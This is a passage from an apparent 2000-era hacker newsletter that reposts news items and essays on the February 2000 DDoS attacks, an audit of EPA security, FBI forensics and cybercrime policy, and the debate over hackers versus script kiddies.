introduced by Rep. Sue Kelly, R-N.Y., passed the House. Hutchison also is co-chairman of the Senate Republican High-Tech Taskforce, along with nearly defunct Y2K Committee Chairman Robert Bennett, R-Utah. She also serves as the chairman of the Senate Commerce Subcommittee on Science, Technology and Space. Bennett has proposed to Senate Majority Leader Trent Lott that the Senate establish a cyberterrorism and Internet security committee after the Year 2000 Committee's demise. Reported by Newsbytes.com @HWA 61.0 HNN:Feb 20th:Racketeering Charges Sought for Cyber Criminals ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond FBI Director Louis Freeh told a Senate subcommittee Wednesday that online criminals should be considered racketeers and hit with lengthy prison terms if it can be proven the assaults were part of an extensive, organized criminal enterprise. Federal racketeering, or RICO, laws have traditionally been used to prosecute mobsters and drug cartels. (Again, when have increased penalties effected the number of crimes committed? Why don't we spend more time on prevention. Or have we given up on that already?) USA Today http://www.usatoday.com/news/washdc/ncswed02.htm (incorrect story url linked... - Ed) @HWA 62.0 HNN:Feb 20th:Serious Online Security Issues Found at EPA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench A General Accounting Office audit team reported to the House Commerce committee that they found "serious and pervasive problems" with the information security implementation of the EPA Systems. The GAO audit team was able to penetrate systems that held sensitive and national security-related information. In response to this report the GAO has temporarily shut down all of their web sites for fear of cyber attack. FundamentalWeaknesses Place EPA Data and Operations at Risk - PDF http://www.gao.gov/new.items/ai00097t.pdf Federal Computer Week http://www.fcw.com/fcw/articles/2000/0214/web-epanetwork-02-18-00.asp ZDNet - via Yahoo http://dailynews.yahoo.com/h/zd/20000218/tc/20000218057.html (404) Federal Computer Weekly: Network security problems at EPA "serious and pervasive" BY Diane Frank and Paula Shaki Trimble 02/18/2000 The Environmental Protection Agency late Tuesday temporarily shut down all access to the Internet following revelations that the agency's information systems and policies suffered from fundamental security weaknesses. The decision to temporarily terminate access to the agency's public and private systems came after a General Accounting Office audit team performing security testing at EPA reported to the House Commerce committee that they found "serious and pervasive problems that essentially render EPA's agencywide information security program ineffective." The types of problems GAO found -- including improperly configured firewalls, vulnerabilities that allowed GAO to take control of EPA's major systems, and a reliance on insecure password controls -- are issues that every federal agency experiences, but not to this extent, said David McClure, associate director of governmentwide and defense information systems in GAO's Accounting and Information Management Division. "The scope and the severity of the weaknesses at EPA were more extensive then we've seen," McClure said. The EPA systems GAO penetrated hold sensitive and national security-related information. They include the National Computing Center's mainframe in Research Triangle Park, N.C., which is one of the systems the White House named in 1998 as critical to defending against cyberattacks. "We knew their lack of security was bad. We didn't know how bad," committee spokesman Steve Schmidt said. "We felt we had no choice but to force EPA's hand if they did not shut down the site." EPA maintained that the shutdown is only temporary. "Our access to the Internet as well as public access has been temporarily suspended while [the National Technology Services Division] implements security measures," said Jerry Slaymaker, senior advisor to the EPA chief information officer. Slaymaker said the agency hopes to restore limited Internet access by Feb. 22. The agency had to shut down the Internet site in addition to its internal network because "we have to go to the place where entrance is being gained or potentially can be gained through the Web site," Slaymaker said. There is no way to repair the front door without limiting all access, he said. "Public access to information is a serious part of the agency's business," he said. "The only thing more important is security of the information." @HWA 63.0 HNN:Feb 20th:FBI Reveals ACES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by xx cu se me In testimony before the Senate Appropriations Subcommittee on Wednesday, FBI Director Louis Freeh revealed a new program the agency calls the Automated Computer Examination System. ACES allows investigators to examine huge areas of magnetic media quickly looking for forensic evidence on computer crimes. This new system was developed in response to the ever increasing size of hard drives today that vastly increases the area that needs to be searched. The Register UK http://www.theregister.co.uk/000217-000003.html Posted 17/02/2000 10:53am by Thomas C. Greene in Washington How the FBI can r00t your hard drive The FBI is working hard to establish itself as the world's premier computer forensics expert. The Bureau has deployed 193 Special Agents devoted specifically to cyber crime, along with more than 100 related support personnel at FBI Headquarters in Washington, and 142 "parts examiners" busily recovering data from seized computers in the field, FBI Director Louis Freeh told the Senate Appropriations Subcommittee Wednesday. "These are people who can take evidence off a hard drive that even fairly sophisticated users would think had been erased," Freeh explained. Most computers sold in 1998 featured hard drives of six to eight GB capacity. But by the end of this year, sixty to eighty GB hard drives will be common, he noted -- and with considerable exaggeration, we observe. To tell the truth, twenty to forty GB hard drives will be "common" towards the end of this year. Sixty to eighty... well, that will remain in the realm of "dream boxes" for some time to come. In any event, the continuing development of big HDDs "vastly increases the area that needs to be searched", he complained. Yet there is hope on the horizon. The FBI has developed a program it calls the Automated Computer Examination System (ACES), which allows investigators to examine huge areas of magnetic media quickly, Freeh revealed. This, combined with the FBI's Computer Wizards' ambition to "de-centralise computer examination," should eventually yield an efficient mechanism for lifting data from confiscated boxes, he reckons. One putatively successful effort along these lines is a collaboration between the FBI and the San Diego Regional Computer Forensics Laboratory. This de-centralised approach is supposed to increase the Bureau's efficiency in forensic investigation. New centres are planned for New England and Texas, and ought to be running soon, Freeh said. � @HWA 64.0 HNN:Feb 20th:New Version of DeCSS Available ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Unprivileged user Pigdog Journal has published a perfectly legal, harmless, and possible useless program to strip Cascading Style Sheet tags. This new application is being named - DeCSS and has nothing at all to do with DVDs. (This should be a good sized pain in the ass for DVD-CCA's lawyers.) Pig Dog Journal http://www.pigdog.org/decss/ @HWA 65.0 HNN:Feb 20th:Y2K Hack Planned for Israel, Local Officials Nervous ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid Anat Maor a member of the Meretz party and head of the Knesset's (Israeli Parliament) Committee for Scientific and Technological Research and Development, was outraged that a hacker convention was taking place in Isreal. Claiming that 'Hacking' was illegal she is trying to get the conference canceled. As far as we know the conference is still on schedule. Wired http://www.wired.com/news/politics/0,1283,34349,00.html HNN Cons Page http://www.hackernews.com/cons/cons.html Y2K Hack http://www.y2hack.com @HWA 66.0 HNN:Feb 21st:French Say Windows is BackDoored By NSA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles and Patrick A report written by a senior officer of the Strategic Affairs Delegation (DAS), a french intelligence agency, has accused the National Security Agency (NSA) of working with computer giant Microsoft to develop software allowing Washington to spy on communications around the world. (The only way Microsoft could be so powerful is with the help of the always streamlined and super-efficient US Government.) The Age http://www.theage.com.au/breaking/0002/19/A27800-2000Feb19.shtml Yahoo News "http://english.hk.dailynews.yahoo.com/headlines/world/cna/article.html? s=hke/headlines/000219/world/cna/US_secret_agents_work_at_Microsoft_cla ims_French_intelligence_report_.html" Intelligence Online - In French http://www.intelligenceonline.fr Intelligence Online - English http://www.IntelligenceOnline.com The Age; US secret agents work at Microsoft: French intelligence Source: AFP | Published: Saturday February 19, 7:44 AM PARIS, Feb 18 - A French intelligence report today accused US secret agents of working with computer giant Microsoft to develop software allowing Washington to spy on communications around the world. The report, drawn up by the Strategic Affairs Delegation (DAS), the intelligence arm of the French Defence Ministry, was quoted in today's edition of the news-letter Le Monde du Renseignement (Intelligence World). Written by a senior officer at the DAS, the report claims agents from the National Security Agency (NSA) helped install secret programmes on Microsoft software, currently in use in 90 per cent of computers. According to the report there was a 'strong suspicion' of a lack of security fed by insistent rumours about the existence of spy programs on Microsoft, and by the presence of NSA personnel in Bill Gates' development teams. The NSA protects communications for the US government, and also intercepts electronic messages for the Defence Department and other US intelligence agencies, the newsletter said. According to the report, 'it would seem that the creation of Microsoft was largely supported, not least financially, by the NSA, and that IBM was made to accept the (Microsoft) MS-DOS operating system by the same administration.' The report claimed the Pentagon was Microsoft's biggest client in the world. @HWA 67.0 HNN:Feb 21st:France Reported to Have Frenchelon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Evidence is surfacing that the French Government has been funding its own version of Echelon, a global eavesdropping network, that has been dubbed Frenchelon. Listening stations for the French network are reported to be in French Guiana, in the city of Domme in the Dordogne region of southwestern France, in New Caledonia, and in the United Arab Emirates. It is also thought that Germany may be involved to help fund the project. Communications Week International - via cfp.org http://www.cfp99.org/program/papers/cukier.htm @HWA 68.0 HNN:Feb 21st:DDoS Attacks Mask the Real Threat ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles While denial of service attacks make the headlines around the world the real threat to computer security continues on its merry way unobstructed by the commotion. Corporate espionage and disgruntled employees are still out there causing trouble, often undetected. The Register UK http://www.theregister.co.uk/000218-000018.html Posted 18/02/2000 1:59pm by Thomas C. Greene in Washington Dot-Com firms are hacking each other -- expert All this talk of fifteen-year-old kids vandalising the Web is a smoke screen behind which dangerous, professional crackers are pleased to take cover, security expert Mark Rasch revealed during testimony before a Senate hearing on Internet security earlier this week. The lure of big, fast-money scores in virtual commerce is making it common for skilled hackers to attack competitors in search of free intellectual property, Rasch said before the Senate Appropriations Subcommittee. The present era of "dot-com millionaires and IPO frenzies and the ease of starting your own business" on the Web is creating "a tremendous amount of competition to acquire intellectual property" by any means at hand, Rasch, a vice president with security outfit Global Integrity, explained. "We see sophisticated attacks against computer systems in order to steal intellectual property which can be used in competition with other companies," he added. Info tech companies may be willing to report a nuisance attack such as the recent DDoS campaign, where no company assets are compromised. But Rasch believes that serious, costly, compromising attacks are rarely reported to the authorities. This is because such companies, which own nothing of substance but are valued principally according to the information they possess, depend heavily on consumer confidence. A prosecution and trial, Rasch observes, would make public the security vulnerability that was exploited, hence the company's hopelessly inadequate security measures, he implied. An info tech company will typically lose between ten and one hundred times more money from shaken consumer confidence than the hack attack itself represents if they decide to prosecute the case, he estimated. Further impediments to accurate cyber-crime reporting come from "a fundamental distrust" of law enforcement among the info tech industry. One common fear is that a crucial piece of equipment, like a main server, say, might be impounded for evidence by over-zealous investigators, thereby shutting the company down. It's hardly a surprise, then, that Rasch cited an estimate claiming that fewer than one in ten serious intrusions are ever reported to the authorities. We can safely assume that the few which are reported tend to be those least likely to shake consumer confidence. This explains why the public has been misled into believing that graffiti attacks and other nuisance intrusions by teenagers account for most of the cyber-crime going on. In fact, because it is to a company's advantage to suffer in silence, the real malicious hacking, which would involve the compromising of crucial data and intellectual property by rival tech firms -- and which probably represents the lion's share of online criminal activity -- is kept as a closely-guarded, dirty little secret. � @HWA 69.0 HNN:Feb 21st:Earlier Attacks on IRC Servers Could Have Been a Warning ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Distributed denial of service attacks against various IRC hosts may have been precursor to the actual attacks against the larger targets. Administrators at Internet America, a mid sized Dallas ISP, say that their IRC servers where hits weeks before Yahoo with a similar attack and believe that it was not a coincidence. Washington Post http://www.washingtonpost.com/wp-dyn/articles/A6148-2000Feb18.html Hackers' Web Weapons Test-Fired on Chat Sites By Ariana Eunjung Cha Washington Post Staff Writer Saturday, February 19, 2000; Page E01 Long before the recent attacks on Yahoo and other popular mainstream Web sites caused an international outcry, a similar kind of electronic warfare raged within the online chat communities that are popular hangouts for hackers. The Internet Relay Chat networks--known by names such as DALnet, EFNet and the Undernet--are subnets made up of dozens of servers around the planet. Often compared to citizens' band radio, they host free, real-time conversations about everything from computer graphics cards to gardening. But because the systems allow anonymous log-ins, some areas have become virtual town squares where hackers gather to trade "warez"--pirated software and cracking programs--and to brag about their conquests. Their visibility in the hacker community has made them "testing grounds" for new attack strategies like the new "distributed denial of service" method that took down more than a dozen popular World Wide Web sites last week, Internet Relay Chat administrators said. This tactic pummels computers with so much data that legitimate users are effectively locked out. "Anything that you see in the wild you are going to see directed at some sort of chat server first," said a security director for Internet America Inc., a mid-size service provider in Dallas that is traded on the Nasdaq Stock Market under the symbol GEEK. The Internet America security expert, who did not want to be named because she is participating in a number of investigations, said that in early February, a week before the recent series of high-profile attacks, her company's server was hit with a similar strike so powerful that it shut out many of its paying subscribers for about three hours. She said she believes that was "no coincidence." Even as FBI agents and independent cybersleuths in the past week have been trolling Internet Relay Chat (IRC) to look for clues about the person who took down Yahoo and other popular sites, the chat networks themselves continue to be hit almost daily with similar attacks. "We've been fighting . . . for over three years now," said Danny Mitchell, co-owner of Internet Chat Systems in Plano, Tex., which maintains a machine linked to the Undernet and fends off denial-of-service strikes several times a week. "It's nothing new. At least now it has people's attention since it happened against someone important." The IRC networks' anarchist nature--born out of the open philosophy of the original Internet--further makes them an attractive target, said Dave Dittrich, a software engineer at the University of Washington-Seattle who has researched denial-of-service attacks. The IRC networks allow users to create private chat rooms, known as channels. The most effective way to break into these conversations is to take down the machine being used by the person who owns the room and hijack the channel. In addition, Dittrich and others say IRC has become such an efficient mode of communication that rival hacker groups have taken down servers to prevent them from speaking with each other. "It's some kind of power play," said Sven Nielsen, 23, the founder of DALnet. "The hacker will run a denial-of-service attack proving 'I'm bigger than you because I can run this tool against you.' " Two days ago, Baltimore-based ABSnet, which is part of the Undernet, one of the oldest and largest gathering places, with more than 50,000 simultaneous users during peak hours, was pummeled with massive numbers of bogus requests for data that sought to muscle out legitimate users. Similar attacks hit its servers on Sunday, Monday and Tuesday--and that was considered a good week. The fake data blocked only about half the pipeline through which users exchange information, rather than closing it completely and crashing the network, as it did late one night in January. "It used to be very hard to knock us off the map, but now the tools are available to practically anybody" said Howard Leadmon, president of ABSnet Internet Services Inc., which hosts the Undernet's command center. "Joe Blow's kid can now surf the Web and find some hacker site and he's become a one-man warrior." Albert Ramnath, a director of Chatnet, an Undernet rival, said his network has fended off similar hits for years. "This morning we had six servers fly apart. This is daily. All it is is 14-year-olds having nothing to do, and we take the heat," he said. Just a few years ago, most IRC services were hosted on university computers. Most of the schools bailed when denial-of-service attacks began in earnest and they found hosting the services too much of a headache. Now IRC is maintained largely by private companies, almost all of them Internet service providers with large data pipes like America Online Inc. and AT&T Corp. (They are one of only a few places on the World Wide Web that have resisted commercialization; companies donate their services and very few make any money off the service.) With the invention of new, more powerful software late last year that allows malicious hackers to hijack dozens of machines to use against a single server, the attacks have become even more virulent. That has made several hosting companies either pare back their involvement or unhook their servers from a number of IRC networks; several chat services have had to shut down as a result. About eight companies have left the Undernet in the past year as a result of the attacks, Leadmon said, and now fewer than 40 are left. He added that several of those businesses lost thousands of dollars in bandwidth and man-hours when their networks were taken down. "I'll be the first to admit it that if they attacked 24 hours a day, I would have to pull every Undernet server down. They would put me out of business," said Leadmon, whose company serves both consumer and business Internet users throughout the Washington-Baltimore area. "There is a limit to nice." One of the people who have claimed credit for attacking the Undernet in the past uses the name "Coolio" and was once affiliated with the hacker group Global Hell, a group of teens who gained notoriety last year for defacing the White House Web site and breaking into an Army computer. That name resurfaced last week as a potential suspect in the recent spate of attacks against Yahoo and other sites, although people in the computer underground said many people use "Coolio," after the rap star of the same name. � 2000 The Washington Post Company @HWA 70.0 HNN:Feb 21st:New DDoS Attacks Stories and Angles ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The FBI is still furiously attempting to dig up information in regards to the now two weeks old denial of service attacks against a dozen or so major web sites. The media frenzy over the this case has reached unheard of levels. Some reporters are now taking a step back and looking at all the commotions and what it really means, other are just looking to report on anything that may be 'hacker' related. Richard Thieme comments on the difference of 'hackers' and 'script-kiddies' and how the meaning of the word 'hacker' has warped so much in the last few years. The Village Voice http://www.villagevoice.com/issues/0007/thieme.shtml Bronc Buster takes a look at law enforcement and how well they have handled or bungled this case, you decide. The Synthesis http://www.thesynthesis.com/tech/keystonecybercops/index.html Old school vs. new school, hacker vs. script-kiddie. Nothing new here they just needed a 'hacker' story for the Friday edition. Washington Post http://www.washingtonpost.com/wp-srv/WPlate/2000-02/18/191l-021800-idx.html Village Voice; HACKING THE FUTURE BY RICHARD THIEME Why Code Crackers Will Lead the Digital Age Let's get our definitions straight. Last week's attacks on dozens of Web sites were not the work of hackers. They were the work of script kiddies, and the difference is everything. Script kiddies download ready-made tools and use them to damage the network. Script kiddies criminally distort the essential ethos of hacking, which is to pass through the network without a trace. Hackers read the unknown, sense the contours of the codes that make all tomorrow's parties and stock market booms. It's no wonder that last week hackers everywhere cringed when the media confused them with script kiddies. Not less than 10 years ago, the word hacker conjured a dedicated geek, hunched over a glowing terminal, working late into the night to solve an intractable dilemma. Now hacker means something akin to cybercriminal. The semantic shift is regrettable, not only because the distortion inhibits clarity, but because it buries a piece of history we'd be wise to keep fresh: It was hackers who cobbled together the Internet. Let's define our terms again. Hacking is a quest for knowledge. You can see the essence of the activity in meetings at security firms like Secure Computing, where hackers are a key part of the professional services team. With clients in the Fortune 500 and three-letter government agencies, like the CIA and FBI, the stakes are high, and when the firm faces a perplexing problem, brainstorming sessions go late into the night. Ideas fly from one person to another like pinballs off flippers, as the group mind turns over and examines the puzzle from all sides. Group mind. There's a concept that flows from the structure of the Internet itself, parallel processor harnessed to parallel processor to achieve a single goal. It's no coincidence that information technology professionals often think in a style similar to the way computers calculate. The network taught them how to reason digitally; it imprinted itself on their minds just as they imprinted their minds on it. Is it any wonder, then, that hackers are the leaders of the new millennium? Again, a question of terminology. By leader I mean someone who forges ahead and names the dim future. Consider Tim Berners-Lee, who designed the first Web protocols and wrote the first browser code. Berners-Lee was a hacker. Or consider Richard Stallman, the evangelist of Open Source software. Stallman is an extraordinary hacker. I could go on and on. I recently consulted with a major mutual fund, and after the meeting I traded war stories with its head of IT. He fondly recalled the old days of hacking Unix systems. That this former "delinquent" now runs a system executing billion-dollar transactions is not shocking. Most of the bright people in the IT business learned how to hack by�what else?�hacking. Let's go back to Open Source for a moment. It's now the conventional wisdom that the Linux operating system and GNU Project are miracles of modern computing, which may one day triumph over the clunky software produced by the Microsoft-Apple cartel. Stallman launched the GNU Project by asking hackers to volunteer their services. Of course, they did. Likewise, Linux was founded on the belief that complex systems must be open, evolving, and free in order to reach their full potential. In other words, they must be hackable and they must be hacked. Continuously. Now comes the FBI and President Clinton with criminal sanctions for these script kiddies. It's right and just to keep the peace, but let's remember that in the Internet's embryonic stage, hacking, far from being criminal, was encouraged. When computers were first networked through telephone lines and slow modems, bulletin boards emerged as crossroads where cybertravelers could leave messages and valuable information about how the phone lines intersected with microprocessors. By these postings, the network formed a symbiotic relationship with its users, and through the give and take of countless exchanges between hackers, the network bootstrapped itself to a higher level of complexity. As Tom Jackiewicz, who helps administer upt.org, an outgrowth of the hackers' favorite, the UPT Bulletin Board, recalls, "In the old days of a decade ago, no kid could afford a Solaris workstation. The only machines available were online. You could learn only by roaming the network." Today the stakes are higher, security tighter, but the basic modalities of hacking and its relationship to innovation remain. The challenge du jour is the gauntlet thrown down by Microsoft, which claims that Windows NT, the operating system of many businesses, is secure. What a claim! For a baseball fan it would be like hearing the Yankees brag that they could play an entire season without losing a single game. Hackers love to find flaws in Windows NT. For them, the payoff is the power rush of the thunk! when the stone hits Goliath in the forehead. One of the sharpest stones to leave a hacker's sling is a program called Back Orifice 2000. Developed by a group called Cult of the Dead Cow, the program can be loaded stealthily on a Windows network, giving a remote user control over the network. Why develop such a weapon? In the current environment of ubiquitous distributed computing�that is, networks and nodes everywhere�the hackers argue that no operating system protects against stealthy executables like Back Orifice. So the program is a form of shock therapy. It jerks Microsoft into action, stirring an indolent industry into making the Internet more secure. The upgrades that come as a result benefit every Windows user. As a culture we are just beginning to recognize this dynamic. One of the first hacker groups to benefit from our grudging acceptance of the craft is LOpht, which crossed over from the computing underground to the mainstream after finding flaws in Windows NT. Their transition has been so successful that when Congress conducted an investigation into Internet security it asked two LOpht members, Mudge and Weld Pond, to come to Washington for a briefing. Now LOpht has teamed up with former Compaq Computer executives to form @Stake, a security firm that has the media and Wall Street swooning. So when is a hacker not a felon? When he receives $10 million in venture capital? When Congress invites him to a hearing? When we lump all hackers into a criminal class we are liable to forget their essential role as architects of the information age. Edward O. Wilson said that scientists are characterized by a passion for knowledge, obsession, and daring. Hackers share that passion, the hunter-gatherer gene for restless wandering, wondering what's beyond the next hill. They hack because it's fun, because it's a challenge, and because the activity shapes their identity. Their strengths�love of risk, toleration of ambiguity, and ability to sift meaning from disparate sources�power the very network we all rush to join. Tell us what you think. editor@villagevoice.com -=- Bronc Buster;The Synthesis Attacks on the internet's most popular sites has prompted a witch hunt carried out by the FBI and embittered corporations... By Bronc Buster Over the last few days, reports have surfaced in the media regarding two names, Mafiaboy and Coolio, reportedly connected with last week's large-scale denial-of-service attacks that managed to temporarily cripple some of the Internet's most visited sites. The FBI is scrambling to track down these two people, asking for court warrants and calling on informers for help in the chase. So what does the FBI have on these two people, Web users whose names are being talked about in the media as though they were two of Americas most wanted cyber-criminals? Recourse Technologies, a so-called Internet Security firm that tracks down hackers, was the first to point a finger at a mysterious person who goes by the name Mafiaboy. According to our investigations, as well as other reports starting to surface, the evidence this group has gathered that supposedly fingers this person is almost laughable. It appears that, last week, an employee from Recourse Technologies got on Inter-Relay Chat and started to visit chat channels frequented by hackers and crackers alike. From here, questions were asked regarding the attacks and someone with the nickname "anon" claimed he was responsible. Later in the chat, he admitted that his real nickname was "Mafiaboy," and not "anon" as he has previously stated. A Wired.Com investigation turned up someone by the name Mafiaboy who had an account at a Canadian Internet Provider, but was removed in early 1998. Also quoted were Canadian authorities, who said that they work closely with the FBI and were working with them on this case, but to date had no knowledge of anyone named "Mafiaboy" in connection to any case on which they were working. After getting on Inter-Relay Chat late Tuesday night, I myself was able to find over half a dozen people going by the nickname Mafiaboy, and almost all of them were playing up to the media hype; several of them were from Canada. Once I started asking questions, I got over 20 people on just one network 'fessing up to being the person who did the attacks. What kind of hard evidence is this, and why is a technology-ignorant media following it like a donkey with a carrot hung out over its head? Coolio, the latest person to be fingered in these attacks by a report from RSA (a company owned by Network Associates) and Stanford University, is also somewhat of a mystery. According to the report, Coolio had claimed responsibility for the defacement of the RSA Web site last week, which reports say mentioned one of the investigators working on the denial-of-service attacks case. In addition to this, the report mentions that Coolio had gain unauthorized access to a system in Russia, and had other proofs that that reportedly connect him with these attacks. Also according to the RSA report, Coolio is said to be living in the Midwest, and they had found his location down to the street address, which was turned over to the FBI. When we here at The Synthesis followed up on the RSA report, it took us no more then a few hours to track down Cooilo. (I must admit that I know him, and have had dealings with him in the past). Cooilo may have originally been from Champaign, Illinois, but now, according to friends who asked to remain anonymous and a simple trace of his Internet Provider, he now resides in the San Diego area of California. Although Coolio refused comment on any questions I raised to him regarding this case and his guilt or innocence, his friends said he had not committed these crimes. They also added that he was deeply concerned that he was being set up, and scared of a possible FBI raid on his residence in the near future. Although The Synthesis hasn't heard all the evidence against Coolio and does not have access to the complete contents of the RSA report sent to the FBI, doubts are starting to rise concerning Coolio's responsibility in these actions. From talking to some of Coolio's friends and long term associates, the general conscience is, not only did he not have the resources to do these attacks, but lacks the level of skill being described by some of the companies who were attacked. It could also be that RSA, whose stock tumbled after their site was hacked by Coolio, have other motives in fingering this hacker in the largest denial-of-service attack in the history of the Internet. With so much media attention being focused on this case, it's almost a mad rush to find someone on whom to put the blame. It stands to reason that whoever catches the person or people responsible will take all the glory and bask in the media spot light, not only helping their career, but the company who they work for in this time of the "online security arms race." Who will be next to step forward and offer someone else to the FBI? I wouldn't be surprised if it was the Psychic Hotline. I also wouldn't be surprised if the people who were responsible for these attacks were never found. Bronc Buster is a California-based hacker who can be reached at bronc@thesynthesis.com -=- Washington Post; The Code of the Hacker Those Who Broke In When The Web First Was Spun Say 'Script Kiddies' Are Ruining Their Image By Libby Copeland Washington Post Staff Writer Friday, February 18, 2000; Page C01 Sometimes when he's playing pool, the answers come. He gets a Bass Ale and a cue. He and his roommate play this complicated version--instead of predicting the next shot, each has to predict the next three shots--and as the white ball spins and Jeff Fay racks up points, he gets these epiphanies. Like, how to crack a certain e-commerce site. Say a hacker intercepted a customer making purchases at an Internet commerce site, and he wants to figure out the password that would let him sneak into the system and access the company's financial information. He's got a computer hooked up to run all the possible passwords in hopes of finding the one, but the process takes so darn long, the customer will probably log off before the hacker cracks the code. Here's where Jeff Fay's revelation comes in. What if the interloper could inject a packet of information that would temporarily pause the connection between the customer and the company? Through a series of these pauses, the hacker could slow the customer's transaction--possibly buying himself enough time to crack the code. Voila. "I think it's fairly elegant," Fay says, the dimple on his right cheek twinkling as he stands by his gray office cubicle in Reston. He's flush with pride, even though he'll never carry out this scheme. It's just the way his mind works: He loves a puzzle; he loves math. He takes pleasure in having a fast, tensile mind. He finds a nice piece of code aesthetically satisfying. All of which makes the denial-of-service attacks that hit Yahoo, CNN, E-trade and other sites last week particularly abhorrent to him. "A bunch of script kiddies flexing their muscles," Fay says, his disdain evident. There's little commonality between true hackers and "the 14-year-old who can't spell Windows NT." Fay considers himself a true hacker. His work, he says, derives from technical expertise and creative inspiration. He and others, who came of age in the early- and mid-'90s, when the Internet was still nascent, see a gulf between themselves and younger Net newbies, who don't seem to respect the technology. Those "script kiddies." You know the stereotype: the lonely, acne-encrusted teen with little technical skill but plenty of vengeance who uses tools written by others to muscle into Web sites. Fay and others scoff when folks call these kids "hackers." The culprits in last week's Web attacks may or may not fit this description. The motive could have been political, rather than adolescent thrill-seeking, and experts quibble over the culprits' technical expertise. But many hackers say a great amount of Internet vandalism is juvenile stuff, the equivalent of picking a sprung lock. The beauty of hacking is lost on these low-level intruders, Fay says. Fay himself earned his street credibility by dabbling in underground ("black hat") hacking in college, and now, as a "white-hat" hacker, he earns money defending the security of Web sites and software. His complaints sound like the familiar tale of one generation denigrating the next, except he is only 24--not much older than the kids he scoffs at. But generational differences can develop in just a few years in the collapsed chronology of the cyberworld. This is about the old--no, older--hackers vs. the new. Hacking is not a phenomenon of the Internet age. In his 1984 book, "Hackers: Heroes of the Computer Revolution," Steven Levy writes of the original computer hackers, MIT University students who in the late '50s and early '60s secretly infiltrated an IBM mainframe to learn its inner workings. Their definition of the hack--"imbued with innovation, style, and technical virtuosity," as Levy writes--formed the intellectual soil upon which Internet age hacking would grow. A fine mind and a criminal intention are not mutually exclusive. Some good hackers have also been good thieves. In 1994 a Russian hacker transferred millions of dollars out of Citibank into various accounts. Last year a hacker (also Russian) stole credit card numbers off a music retailer's site and tried to ransom them. There have also been plenty of politically motivated attacks, not the least of which may have been last week's. Bruce Sterling, one of the early chroniclers of hacker culture, says the Yahoo bombardment takes a page from '60s dissidents like Abbie Hoffman, who once dropped money onto the floor of the New York Stock Exchange. The brokers dove for the money. It proved, to Hoffman, their crass materialism. Nevertheless, Sterling adds, in terms of technical expertise, last week's attacks were "as dumb as a bag of hammers." "Most of the attacks tend to be not really highly sophisticated," says Elias Levy, chief technology officer with SecurityFocus.com, a West Coast company. As for motivation, Levy says, "most of the attacks tend to be for pure acceptance within the hacker community. Sadly, a lot of the time the political message is only an afterthought." It's not surprising that the hacking culture is changing. In the early '90s, those who had access to the developing Internet were often university students with connections to computer science. Nowadays, the pool of Internet users is far greater, and, as Sterling points out, unfettered access to the Internet is the province of middle- and upper-class teenagers. Once, says Jeff Moss, who runs the West Coast hacker conventions DefCon and Blackhat, hackers were a community. There was a give-and-take. There were relationships. "Nobody would share information with you if you didn't share information back," he says. "Now the problem is, knowledge isn't being traded as little tidbits. It's available for free, and so there's no natural screening process. And there's no socialization." Imagine. Hackers--who usually seem to operate outside the law--preaching socialization and all its implications: responsibility, ethics. This is a familiar plot: The aristocracy crumbles when the gates open and commoners rush in. In the words of Jim Thomas, a professor at Northern Illinois University who also runs an online journal of the computer underground, you "have a diversity of people, and unfortunately they begin to reflect the general population much more. You get your bozos." There's no denying that hackerdom has long offered a mystique, and mystique is the equivalent of catnip for teenagers. To be righteous, misunderstood and powerful--that amounts to glory in the adolescent world. So, to amend a phrase from the ever-popular show, "Who Wants to Be a Hacker"? Check the search engines. The Web is rife with Net newbies begging, "Teach me how to hack." Among the letters to the editor in the latest issue of the online hacker magazine Phrack, they plead: "Hi, I am a wannabe hacker . . . Where will i find material describing typical methods to test the systems for security[?]" Or, "i'm a future hacker to be for now i need info about a free server." Or, "I found my schools dial-up and I want you guys to try and hack it if you can . . . [Mess] it up as much as possible please!" When they do acquire tools, they often deface Web sites, leaving messages complete with misspellings, expletives and shout-outs that are reminiscent of early '80s graffiti wars. The paradox is that true hackers have provided the entry into this vandalism. "Gray hat" hackers, like the legendary group L0pht, which has now joined with the security firm @Stake in Cambridge, Mass., have frequently posted scripts that others used to break into Web sites. Jeff Fay himself has poked around for software bugs and posted them publicly--a common practice among hackers. Critics say this is like breaking into someone's house and leaving the door open, while robbers mill about on the street outside. But like most true hackers, Fay abides by the dictum "information wants to be free." Hackers, he says, do everyone a favor by pointing out soft spots and putting pressure on otherwise lax security administrators or software creators to fix things. "The people who are developing attacks and posting them, I don't consider them evil," he says. "They're really doing quality control," he says. In any case, many hackers say all of this is peripheral to their original intention. In the beginning, says Brian Martin, who is an editor with the hacker site attrition.org, "the whole goal [of hacking] was not to be discovered. . . . To go in, figure out how a system worked, and leave, just as quietly." The purpose was understanding. Fay understands these ambiguities. He's working for Infrastructural Defense, a company that provides Internet security. He and many of his hacker friends are now paid to hunt for vulnerabilities on behalf of their clients, and to fix them. On a shelf in his cubicle, he keeps "Cryptography" and "Applied Cryptography." But he knows his roots originate in a smaller, more elite--and perhaps disappearing--society of hackers. Atop his wispy blond hair he wears a black cap that reads "2600," the name of a well-respected online hacker magazine. He also wears a hacker T-shirt that sarcastically reads, "I {heart} Feds." Until, that is, he finds out that someone wants to 